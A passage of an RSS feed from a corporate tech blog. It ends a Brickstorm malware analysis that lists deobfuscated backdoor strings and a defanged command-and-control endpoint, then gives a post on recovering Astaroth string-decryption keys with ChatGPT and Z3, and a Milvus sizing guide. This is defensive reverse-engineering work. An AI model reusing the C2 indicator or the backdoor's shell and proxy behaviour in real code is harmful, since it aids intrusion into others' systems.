Reader&#39;<br>websocket&#39;<br>Connection&#39;<br>Sec-WebSocket-Key&#39;<br>Sec-WebSocket-Version&#39;<br>Sec-WebSocket-Protocol&#39;<br>Connection&#39;<br>Sec-Websocket-Key&#39;<br>Sec-Websocket-Version&#39;<br>Sec-Websocket-Extensions&#39;<br>Sec-Websocket-Protocol&#39;<br>websocket: duplicate header not allowed: &quot;<br>Sec-Websocket-Protocol&quot;<br>Sec-WebSocket-Protocol&#39;<br>Sec-WebSocket-Extensions&#39;<br>permessage-deflate; server_no_context_takeover; client_no_context_takeover&quot;<br>websocket&#39;<br>Connection&#39;<br>Sec-Websocket-Accept&quot;<br>permessage-deflate&#39;<br>Proxy-Authorization&#39;<br>socks connect&#39;<br>socks bind&#39;<br>succeeded&#39;<br>general SOCKS server failure&#39;<br>connection not allowed by 
ruleset&#39;<br>network unreachable&#39;<br>TTL expired&#39;<br>command not supported&#39;<br>nil context&#39;<br>nil context&#39;<br>network not implemented&#39;<br>command not implemented&#39;<br>username/password authentication failed&#39;<br>unsupported authentication method &#39;<br>too many authentication methods&#39;<br>unexpected protocol version &#39;<br>no acceptable authentication methods&quot;<br>unknown address type&#39;<br>FQDN too long&#39;<br>unexpected protocol version &#39;<br>unknown error &#39;<br>non-zero reserved field&#39;<br>unknown address type &#39;<br>ALL_PROXY&#39;<br>all_proxy&#39;<br>failed to dial: %s&#39;<br>User-Agent&#39;<br>User-Agent&#39;<br>failed to dial %s:%s, Err:%s&quot;<br>method is not allowed&#39;<br>no matching route was found&#39;<br>mux: duplicated route variable %q&#39;<br>mux: path must start with a slash, got %q&#39;<br>mux: missing name or pattern in %q&#39;<br>%s(?P&lt;%s&gt;%s)&#39;<br>mux: unbalanced braces in %q&#39;<br>mux: unbalanced braces in %q&#39;<br>nil pointer to error encoder&#39;<br>/WindowsDriver/&#39;<br>invalid range: failed to overlap&quot;<br>127.0.0.1:0&quot;<br>Content-Type&#39;<br>text/html; charset=utf-8&#39;<br>ailed: %s\n&quot;<br>uploadFile&quot;<br>ailed: %s\n&#39;<br>rror: %s\n&#39;<br>re&gt;up over\n%s sha256sum: %x\n&lt;/pre&gt;&#39;<br>&lt;a style=\&#39;text-decoration: none;\&#39; href=&quot;%s/&quot;&gt;%s&lt;/a&gt;&lt;/p&gt;\n&#39;<br>Error reading directory&#39;<br>Content-Type&quot;<br>text/html; charset=utf-8&#39;<br>style=\&#39;text-decoration: none;\&#39;  href=&quot;%s&quot;&gt;&lt;h5&gt;..&lt;/h5&gt;&lt;/a&gt;\n&#39;<br>a style=&#39;text-decoration: none;&#39;&gt;&lt;h5&gt;now at: %s&lt;/h5&gt;&lt;/a&gt;\n&quot;<br>otal %d\n&#39;<br>Content-Type&#39;<br>seeker can&#39;t seek&quot;<br>Content-Type&#39;<br>Content-Range&#39;<br>bytes */%d&#39;<br>Content-Range&#39;<br>Content-Type&#39;<br>multipart/byteranges; boundary=&quot;<br>Accept-Ranges&#39;<br>If-Unmodified-Since&quot;<br>If-None-Match&#39;<br>If-Modified-Since&#39;<br>Last-Modified&#39;<br>Content-Type&quot;<br>Content-Length&#39;<br>Last-Modified&quot;<br>/index.html&#39;<br>Last-Modified&#39;<br>404 page not found&#39;<br>403 Forbidden&#39;<br>bytes %d-%d/%d&#39;<br>Content-Range&#39;<br>Content-Type&#39;<br>invalid range&quot;<br>invalid range&#39;<br>invalid range&#39;<br>invalid range&quot;<br>invalid range&#39;<br>unsupported&#39;<br>/dev/ptmx&#39;<br>/dev/pts/&#39;<br>wss://natsupport[.]net/api&#39;<br>/opt/vmware/vpostgres/current/bin/pg_update&#39;<br>/usr/sbin&#39;<br>rpclistener&#39;<br>/usr/sbin/rpclistener&#39;<br>exit status 121&quot;<br>f\xff&#39;<br>(empty)&#39;<br>%x&#39;<br>Initial&#39;<br>0&#39;<br>1&#39;<br>Server&#39;<br>Client&#39;<br>Initial&#39;<br> &#39;<br> &#39;<br> &#39;<br>cpu.&quot;<br>\n&#39;<br>on&#39;<br>\n&#39;<br>\n&#39;<br>avx512&#39;<br>avx512f&quot;<br>bmi1&#39;<br>bmi2&#39;<br>erms&#39;<br>popcnt&#39;<br>rdrand&#39;<br>rdseed&quot;<br>sse3&#39;<br>)&#39;<br>*&#39;<br>.&#39;<br>derived&#39;<br>derived&#39;<br>.&#39;<br>derived&#39;<br>derived&#39;<br>tls13 &#39;<br>: &#39;<br>-&gt;&#39;<br>, &#39;<br>t%s 
%#v&quot;<br>ENOENT&#39;<br>ENOEXEC&#39;<br>ECHILD&#39;<br>EAGAIN&#39;<br>ENOMEM&#39;<br>EACCES&quot;<br>EFAULT&#39;<br>ENOTBLK&#39;<br>EEXIST&#39;<br>ENOTDIR&quot;<br>EISDIR&#39;<br>EINVAL&#39;<br>EMFILE&#39;<br>ENOTTY&#39;<br>ETXTBSY&#39;<br>ENOSPC&#39;<br>ESPIPE&#39;<br>EMLINK&#39;<br>EDOM&#39;<br>ERANGE&#39;<br>EDEADLK&#39;<br>ENOLCK&#39;<br>ENOSYS&#39;<br>ENOMSG&#39;<br>ECHRNG&#39;<br>EL3HLT&#39;<br>EL3RST&#39;<br>ELNRNG&#39;<br>EUNATCH&#39;<br>ENOCSI&#39;<br>ENOANO&quot;<br>EBADSLT&#39;<br>EBFONT&#39;<br>ENOSTR&#39;<br>ENODATA&#39;<br>ENONET&#39;<br>ENOPKG&#39;<br>EREMOTE&#39;<br>EADV&#39;<br>ESRMNT&quot;<br>EPROTO&#39;<br>EDOTDOT&#39;<br>EBADMSG&#39;<br>EREMCHG&#39;<br>ELIBACC&#39;<br>ELIBBAD&#39;<br>ELIBSCN&#39;<br>ELIBMAX&#39;<br>EILSEQ&#39;<br>EUSERS&#39;<br>ENOBUFS&#39;<br>EUCLEAN&#39;<br>ENOTNAM&#39;<br>ENAVAIL&#39;<br>EISNAM&#39;<br>ENOKEY&#39;<br>ERFKILL&#39;<br>SIGHUP&#39;<br>hangup&#39;<br>SIGINT&#39;<br>SIGQUIT&#39;<br>quit&#39;<br>SIGILL&#39;<br>SIGTRAP&#39;<br>SIGABRT&quot;<br>aborted&#39;<br>SIGBUS&#39;<br>SIGFPE&#39;<br>SIGKILL&#39;<br>killed&#39;<br>SIGUSR1&#39;<br>SIGSEGV&quot;<br>SIGUSR2&#39;<br>SIGPIPE&#39;<br>SIGALRM&quot;<br>SIGTERM&#39;<br>SIGCHLD&#39;<br>SIGCONT&#39;<br>SIGSTOP&#39;<br>stopped&#39;<br>SIGTTIN&#39;<br>SIGTTOU&#39;<br>SIGURG&#39;<br>SIGXCPU&#39;<br>SIGXFSZ&#39;<br>SIGPROF&#39;<br>SIGPWR&#39;<br>SIGSYS&#39;<br>solaris&#39;<br>netbsd&#39;<br>openbsd&#39;<br>/&#39;<br>recvmsg&#39;<br>android&#39;<br>illumos&#39;<br>windows&#39;<br>tcp6&#39;<br>udp6&#39;<br>/&#39;<br>/&#39;<br>read&#39;<br>none&#39;<br>quic hp&#39;<br>quic hp&#39;<br>tls13 &#39;<br>quic ku&#39;<br> &#39;<br> &#39;<br>server&#39;<br>init&#39;<br>suspend&#39;<br>none&#39;<br>null&#39;<br>server&#39;<br>cc|)&#39;<br>exit&#39;<br>Remove&#39;<br>closed&#39;<br>timeout&#39;<br>\xff&#39;<br>socks5&#39;<br>tcp4&#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>&quot;&#39;<br>;&#39;<br>=&#39;<br>: &#39;<br>:&#39;<br>]&#39;<br>http&#39;<br>Upgrade&#39;<br>13&#39;<br>, &#39;<br>Host&#39;<br>Upgrade&#39;<br>upgrade&#39;<br>http&#39;<br>:&#39;<br>Basic &#39;<br>CONNECT&quot;<br> &#39;<br>socks &#39;<br>tcp4&#39;<br>Origin&#39;<br>smux&#39;<br>http&#39;<br>socks5&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>:&#39;<br>[/]?&#39;<br>=&#39;<br>:&#39;<br>=&#39;<br>=&#39;<br>&amp;;&#39;<br>v&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>&amp;&#39;<br>&amp;lt;&#39;<br>&gt;&#39;<br>&amp;gt;&#39;<br>&quot;&#39;<br>%v&#39;<br>%v&#39;<br>/&#39;<br>Post&#39;<br>/api&#39;<br>windows&#39;<br>/&#39;<br>/&#39;<br>pre&gt;\n&#39;<br>/&#39;<br>/pre&gt;\n&#39;<br>%.2fMB&#39;<br>%.2fGB&#39;<br>%.2fTB&#39;<br>%.2fEB&#39;<br>HEAD&#39;<br>W/&#39;<br>W/&#39;<br>W/&#39;<br>Etag&#39;<br>Etag&#39;<br>Etag&#39;<br>Etag&#39;<br>./&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>bytes=&#39;<br>,&#39;<br>-&#39;<br>nil EOF&#39;<br>/&#39;<br># &#39;<br> &#39;<br>exit&#39;<br>cd&#39;<br>n&#39;<br>nil EOF&#39;<br>/bin/sh&#39;<br>-c&#39;<br>nil EOF&#39;<br>ICMP&#39;<br>n&#39;<br> &#39;<br> &#39;<br>/&#39;<br>:&#39;<br>SETENV1&#39;<br>SETENV2&#39;<br>true&#39;<br>TERM&#39;<br>USER&#39;<br>PATH&#39;<br>TERM&#39;<br>USER&#39;<br>true&#39;<br>PATH&#39;</pre><h3>IOCs</h3><pre>wss://natsupport[.]net/api</pre><h3>References</h3><p>1: <a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign">https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign</a></p><p>2: <a 
href="https://cloud.google.com/blog/topics/threat-intelligence/gostringungarbler-deobfuscating-strings-in-garbled-binaries">https://cloud.google.com/blog/topics/threat-intelligence/gostringungarbler-deobfuscating-strings-in-garbled-binaries</a></p><p>3: <a href="https://research.openanalysis.net/garble/go/obfuscation/strings/2023/08/03/garble.html">https://research.openanalysis.net/garble/go/obfuscation/strings/2023/08/03/garble.html</a></p><p>4: <a href="https://github.com/burrowers/garble">https://github.com/burrowers/garble</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b0a60828b3cc" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/decoding-brickstorms-garble-strings-b0a60828b3cc">Decoding Brickstorms Garble strings</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Utilizing ChatGPT for Decoding Astaroth Strings]]></title>
            <link>https://medium.com/walmartglobaltech/utilizing-chatgpt-for-decoding-astaroth-strings-80815e4dfefb?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/80815e4dfefb</guid>
            <category><![CDATA[reverse-engineering]]></category>
            <category><![CDATA[malware]]></category>
            <category><![CDATA[chatgpt]]></category>
            <category><![CDATA[infosec]]></category>
            <dc:creator><![CDATA[Jason Reaves]]></dc:creator>
            <pubDate>Mon, 24 Nov 2025 15:48:52 GMT</pubDate>
            <atom:updated>2025-11-24T15:48:50.289Z</atom:updated>
<content:encoded><![CDATA[<p>By: Jason Reaves</p><p>In this blog I want to demonstrate a scenario that I run into occasionally as a Reverse Engineer. There are plenty of excellent write-ups on Astaroth from a technical perspective[1,2], so I decided to utilize existing analysis and leverage ChatGPT[5] to aid in the analysis of a binary sample.</p><p>The sample below was primarily used to turn existing work into a script that leverages an SMT solver[6] to find the key for the string decoding instead of relying on recovering the key from the binary:</p><pre>d3737da15c3439efd0aecf0492573c81bb24d25c6ce510da6da048cee671e3d7</pre><p>It’s good practice when using others’ research to verify the same code patterns; in this case I used their work to quickly map out the relevant decrypt functions in the binary:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/756/1*R9VjvyGcd1TKougOIuamgQ.png" /></figure><p>Now I take the code from both blogs and combine it into a single function, based primarily on the Acronis blog code:</p><pre>def decode(s):<br>    #decrypt<br>    key = b&quot;XYQMDOW8&quot;<br>    s = bytes.fromhex(s)<br>    out1 = b&quot;&quot;<br>    for i in range(1, len(s)):<br>        k = s[i - 1]<br>        b = s[i]<br>        a = b ^ key[(i - 1) % len(key)]<br>        if a &gt; k:<br>            a = a - k<br>        else:<br>            a = a + 255 - k<br>        out1 += bytes([a &amp; 0xff])<br><br>    #decrypt2<br>    out2 = b&quot;&quot;<br>    for c in out1[::-1]:<br>        c = ~(c - 0x0A) &amp; 0xFF<br>        out2 += bytes([c])<br><br>    #decrypt3<br>    key = out2[0] - 0x41<br>    out3 = b&quot;&quot;<br>    for i in range(1, len(out2), 2):<br>        c = out2[i + 1] - 0x41 + ((out2[i] - 0x41) * 25) - key - 0x64<br>        out3 += bytes([c &amp; 0xFF])<br><br>    return out3</pre><p>I noticed that when questioning ChatGPT you have to be cognizant of the phrasing, otherwise ChatGPT will get stuck in a cycle of complaining about cryptanalysis.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*l-HKWdi0Okcj8PwGf7GD1g.png" /></figure><p>After inputting the code, ChatGPT expected the input and output mentioned previously:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZhfCtip50KY6Le-UzS6kuA.png" /></figure><p>Next it dumps out the code with the additional Z3 functionality:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QkKu1-XP9HZ7IAXkxZn6UQ.png" /></figure><p>Running the code out of the box gave an incorrect key:</p><pre> % python3 chatgpt.py <br>Z3 check: sat<br>Recovered key (raw bytes): b&#39;x9QMDOW8&#39;<br>Recovered key (ASCII): x9QMDOW8</pre><p>So, a character constraint is added based on known keys:</p><pre>allowed_vals = [ord(c) for c in &quot;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&quot;]<br>charset_constraints = [Or([key[i] == v for v in allowed_vals]) for i in range(len(key))]<br>solver.add(charset_constraints)</pre><p>This gives us the correct key:</p><pre>% python3 chatgpt.py<br>Z3 check: sat<br>Recovered key (raw bytes): b&#39;XYQMDOW8&#39;<br>Recovered key (ASCII): XYQMDOW8</pre><p>In this blog[2] there are also more strings listed that use a different key, so we can test further:</p><pre>decode((int)L&quot;87647C0D8B7C0AE3F2E8F0961FDF&quot;, &amp;JoeBox, a1, a2, a3);// JoeBox</pre><pre>s_hex = &quot;87647C0D8B7C0AE3F2E8F0961FDF&quot;<br>expected_out3 = b&quot;JoeBox&quot;<br><br>% python3 chatgpt.py<br>Z3 check: sat<br>Recovered key (raw bytes): b&#39;XY7F85HH&#39;<br>Recovered key (ASCII): XY7F85HH</pre><p>Close, but let’s try a different string that is longer:</p><pre>s_hex = &quot;726B7210966F1AEFF99801F4F295602EB9D9C0B335C0B55C48A5&quot;<br>expected_out3 = b&quot;HookExplorer&quot;<br><br>% python3 chatgpt.py<br>Z3 check: sat<br>Recovered key (raw bytes): b&#39;XY7F852V&#39;<br>Recovered key (ASCII): XY7F852V</pre><p>That one produced the correct key, so it looks like we would probably need two known strings (one to solve with and one to test the produced key against), or we need to focus on strings of a specific length and loop through them looking for potential keys in other samples.</p>
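<p>Putting the pieces together, here is a minimal sketch of what such a Z3-based key recovery can look like for the HookExplorer pair above, with the decode logic and the character-set constraint combined into one script. This is a reconstruction for illustration (the variable names and structure are my own assumptions), not the exact code ChatGPT produced in the screenshots:</p><pre>from z3 import BitVec, BitVecVal, If, UGT, Or, Solver, sat<br><br># Known ciphertext/plaintext pair taken from blog [2]<br>s_hex = &quot;726B7210966F1AEFF99801F4F295602EB9D9C0B335C0B55C48A5&quot;<br>expected_out3 = b&quot;HookExplorer&quot;<br><br>s = bytes.fromhex(s_hex)<br>key = [BitVec(&quot;key_%d&quot; % i, 8) for i in range(8)]<br>solver = Solver()<br><br># decrypt: the same rolling XOR/subtract as decode(), but over symbolic key bytes<br>out1 = []<br>for i in range(1, len(s)):<br>    k = BitVecVal(s[i - 1], 8)<br>    a = BitVecVal(s[i], 8) ^ key[(i - 1) % 8]<br>    out1.append(If(UGT(a, k), a - k, a + 255 - k))<br><br># decrypt2: reverse, subtract 0x0A, bitwise NOT (8-bit wrap matches the &amp; 0xFF)<br>out2 = [~(c - 0x0A) for c in out1[::-1]]<br><br># decrypt3: the per-string key byte is derived from the data itself<br>k3 = out2[0] - 0x41<br>out3 = [out2[i + 1] - 0x41 + (out2[i] - 0x41) * 25 - k3 - 0x64<br>        for i in range(1, len(out2) - 1, 2)]<br><br># Constrain the symbolic output to the known plaintext<br>for sym, want in zip(out3, expected_out3):<br>    solver.add(sym == want)<br><br># Character-set constraint: key bytes look like [A-Z0-9]<br>allowed_vals = [ord(c) for c in &quot;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&quot;]<br>for kb in key:<br>    solver.add(Or([kb == v for v in allowed_vals]))<br><br>res = solver.check()<br>print(&quot;Z3 check:&quot;, res)<br>if res == sat:<br>    m = solver.model()<br>    print(&quot;Recovered key:&quot;, bytes(m[kb].as_long() for kb in key))</pre>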
<h3>References</h3><p>1: <a href="https://www.acronis.com/en/tru/posts/astaroth-unleashed/">https://www.acronis.com/en/tru/posts/astaroth-unleashed/</a></p><p>2: <a href="https://github.com/purplededa/Astaroth---Malware-Analysis-Report?tab=readme-ov-file">https://github.com/purplededa/Astaroth---Malware-Analysis-Report?tab=readme-ov-file</a></p><p>3: <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/astaroth-banking-trojan-abusing-github-for-resilience/">https://www.mcafee.com/blogs/other-blogs/mcafee-labs/astaroth-banking-trojan-abusing-github-for-resilience/</a></p><p>4: <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth">https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth</a></p><p>5: <a href="https://chatgpt.com/">https://chatgpt.com/</a></p><p>6: <a href="https://github.com/Z3Prover/z3">https://github.com/Z3Prover/z3</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=80815e4dfefb" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/utilizing-chatgpt-for-decoding-astaroth-strings-80815e4dfefb">Utilizing ChatGPT for Decoding Astaroth Strings</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Demystifying Milvus Configuration: A Data Scientist’s Guide to Milvus Resource Requirements]]></title>
            <link>https://medium.com/walmartglobaltech/demystifying-milvus-configuration-a-data-scientists-guide-to-milvus-resource-requirements-3f9aaf2d0dfc?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/3f9aaf2d0dfc</guid>
            <category><![CDATA[genai]]></category>
            <category><![CDATA[llm]]></category>
            <category><![CDATA[data-science]]></category>
            <category><![CDATA[machine-learning]]></category>
            <dc:creator><![CDATA[Subrat Sekhar Sahu]]></dc:creator>
            <pubDate>Wed, 15 Oct 2025 04:01:19 GMT</pubDate>
            <atom:updated>2025-10-15T04:01:14.956Z</atom:updated>
<content:encoded><![CDATA[<p>You’ve built your model, generated your embeddings, and you are ready to power a real-time similarity search application. You chose Milvus, a popular open-source vector database, and it is brilliant. But then you look at the deployment configuration and you see a wall of Helm config YAML.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/411/1*DO3xZ2IgQ9K7mowyHiuQag.png" /></figure><p>What does it all mean? Why does a <em>queryNode</em> need a whopping 16GB of RAM while a <em>queryCoordinator</em> (as we’ll see later) only needs 0.5GB?</p><p><strong>The Challenge: From Data Science to DevOps</strong></p><p>This isn’t just a configuration file; it is a blueprint for your application’s performance, scalability and cost. For many data scientists, it is an intimidating black box. This creates several key challenges:</p><ul><li><strong>Performance Bottlenecks:</strong> When search is slow or data ingestion stalls, where do you look? Is it a CPU limit on the proxy? A memory shortage on the <em>queryNode</em>? Guessing is inefficient and can lead to a frustrating user experience.</li><li><strong>Communication Gaps</strong>: It’s difficult to collaborate with your Infrastructure or DevOps team if you can’t speak their language. Telling them “search is slow” is far less effective than saying “Our query volume has doubled and I suspect we’re hitting a memory ceiling on our <em>queryNodes</em>. Can we monitor their usage and plan to scale them up?”</li><li><strong>Inefficient Scaling and Cost</strong>: Without understanding the role of each component, you might over-provision resources, leading to wasted cloud spend, or under-provision, limiting your application’s performance.</li></ul><p>Today, we’re going to break down a typical Helm config YAML for Milvus. Specifically, we will look at the resource requirements mentioned in the config and discuss how these affect the performance of the vector database. This understanding will help you diagnose performance issues, plan for scale and communicate effectively with the Infrastructure team. The following discussion applies to a Milvus instance deployed in distributed mode (on Kubernetes) using the Milvus Helm charts. However, the learnings can be extended to make resource-related decisions for other deployment modes as well.</p><p><strong>Precursors</strong></p><p>· <strong>Milvus</strong> is an open-source vector database specifically designed for efficient similarity search. It helps in storing, indexing and querying vector embeddings generated from unstructured data, enabling AI applications like semantic search, image recognition and recommendation systems to quickly find semantically similar data.</p><p>· <strong>Helm</strong> is the package manager for Kubernetes. It bundles all necessary Kubernetes resources and configurations into a single, version-controlled unit called a “Chart”. For Milvus specifically, the official Milvus Helm Chart is used to easily configure resources like CPU, memory and replicas for each of its services (e.g., queryNode, minio, proxy) by providing simple YAML override values.</p><p><strong>The Big Picture: A City of Microservices</strong></p><p>Think of a Milvus cluster not as a single program, but as a group of specialized workers. Each worker has a specific job and they all communicate to get things done.</p><p>These workers can be grouped into three main categories:</p><ol><li>The Brains (Coordinators): The management layer that directs traffic and keeps track of everything.</li><li>The Brawn (Worker Nodes): The heavy lifters that handle data, build indexes and run searches.</li><li>The Backbone (Dependencies): The essential infrastructure like storage, messaging and memory.</li></ol><p><strong>The Brains: The Coordinator Nodes</strong></p><p>These are the managers. They are generally lightweight because they delegate the hard work. They mostly handle metadata, not the raw vector data itself.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pNteXIDT9WnzwQstlFdoUg.png" /></figure><p>💡 Key Insight: Notice how small the resource requests are for these components (0.5 to 1 CPU and 0.5 to 2GiB of memory). They are orchestrators, not workers. Keeping them separate allows Milvus to scale its management and data-handling capabilities independently.</p><p><strong>The Brawn: The Worker Nodes</strong></p><p>This is where the magic and the heavy lifting happen. These are the nodes whose resource allocation will most directly impact the application’s performance.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/892/1*nPMZwf7-QmUgu7ipEAtCpg.png" /></figure><p>💡 Key Insight: The queryNode has the highest memory request (16GiB) for a reason. Vector search is a memory game. The more vectors you can fit into RAM, the faster your searches will be. When planning capacity, the queryNode’s memory is the most important metric.</p>
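<p>To make that concrete, here is a rough back-of-the-envelope estimate (a sketch, not the official sizing method) of how much queryNode memory the raw vectors alone consume. It ignores index structures and Milvus overhead, so treat it as a lower bound and use the sizing tool linked in the references for real planning:</p><pre># Lower bound: raw float32 vectors only; index structures and Milvus<br># overhead add more on top of this.<br>def raw_vector_gib(num_vectors: int, dim: int, bytes_per_value: int = 4) -&gt; float:<br>    return num_vectors * dim * bytes_per_value / (1024 ** 3)<br><br># Example: 10 million 768-dimensional embeddings<br>print(f&quot;{raw_vector_gib(10_000_000, 768):.1f} GiB&quot;)  # ~28.6 GiB, already more than one 16GiB queryNode</pre>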
<p><strong>The Backbone: The Dependencies</strong></p><p>Milvus doesn’t reinvent the wheel for basic infrastructure. It relies on battle-tested open-source projects.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/892/1*hSQVVFY2PvpB5JLAUS4lIA.png" /></figure><p>💡 And a bonus:</p><ul><li>attu: 1 replica, 1 CPU, 1GiB RAM. This is the official web-based GUI for Milvus. It’s a handy tool for browsing collections and running quick tests, with minimal resource needs.</li></ul><p><strong>Putting It All Together: The Lifecycle of a Query</strong></p><ol><li>Your app (via the SDK) sends a search request to the Proxy (a minimal example follows this list).</li><li>The Proxy forwards it to the Query Coordinator.</li><li>The Query Coordinator checks its metadata (from etcd) to see which Query Nodes hold the relevant data.</li><li>It sends a search task to the right Query Node(s) via the Kafka message bus.</li><li>Each Query Node loads the necessary index/data into its massive RAM and performs the lightning-fast vector search.</li><li>The results travel back up the chain to your application.</li></ol>
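<p>As a concrete illustration of step 1, here is a minimal sketch of what the application side of that lifecycle can look like with the pymilvus SDK. The host, collection name and field name below are placeholders for this example, not values from the configuration we reviewed:</p><pre>from pymilvus import connections, Collection<br><br># Connect to the Milvus proxy, the only component the application talks to directly.<br>connections.connect(alias=&quot;default&quot;, host=&quot;my-milvus-proxy&quot;, port=&quot;19530&quot;)<br><br>collection = Collection(&quot;products&quot;)   # placeholder collection name<br>collection.load()                     # data must be loaded into queryNode memory before searching<br><br>query_vector = [0.1] * 768            # an embedding produced by your model<br><br># The proxy routes this search through the Query Coordinator to the queryNodes.<br>results = collection.search(<br>    data=[query_vector],<br>    anns_field=&quot;embedding&quot;,           # placeholder vector field name<br>    param={&quot;metric_type&quot;: &quot;L2&quot;, &quot;params&quot;: {&quot;nprobe&quot;: 10}},<br>    limit=5,<br>)<br>for hit in results[0]:<br>    print(hit.id, hit.distance)</pre>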
<p><strong>Your Takeaways as a Data Scientist</strong></p><ul><li>Query Performance is Memory: If you need faster searches or want to search over more data, focus on the queryNode resources.</li><li>Ingestion Throughput is Proxy/DataNode: If you’re struggling to insert data quickly, you might need to scale your proxy and dataNode replicas.</li><li>Base Configuration is a Starting Point: The config we reviewed is a solid, well-provisioned starting point. Your ideal setup will depend on your vector dimensionality, the number of vectors, and your query-per-second (QPS) requirements.</li><li>Speak the Language: Now, instead of saying “search is slow,” you can have a more informed conversation: “I suspect we’re hitting a memory ceiling on our queryNodes. Can we monitor their memory usage and consider scaling them up?”</li></ul><p>Hopefully, the resource requirements for Milvus now look a little less like a mystery and a lot more like a blueprint for your vector searches.</p><p>References:</p><p>· <a href="https://milvus.io/tools/sizing">https://milvus.io/tools/sizing</a></p><p>· <a href="https://github.com/zilliztech/milvus-helm">https://github.com/zilliztech/milvus-helm</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=3f9aaf2d0dfc" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/demystifying-milvus-configuration-a-data-scientists-guide-to-milvus-resource-requirements-3f9aaf2d0dfc">Demystifying Milvus Configuration: A Data Scientist’s Guide to Milvus Resource Requirements</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
    </channel>
</rss>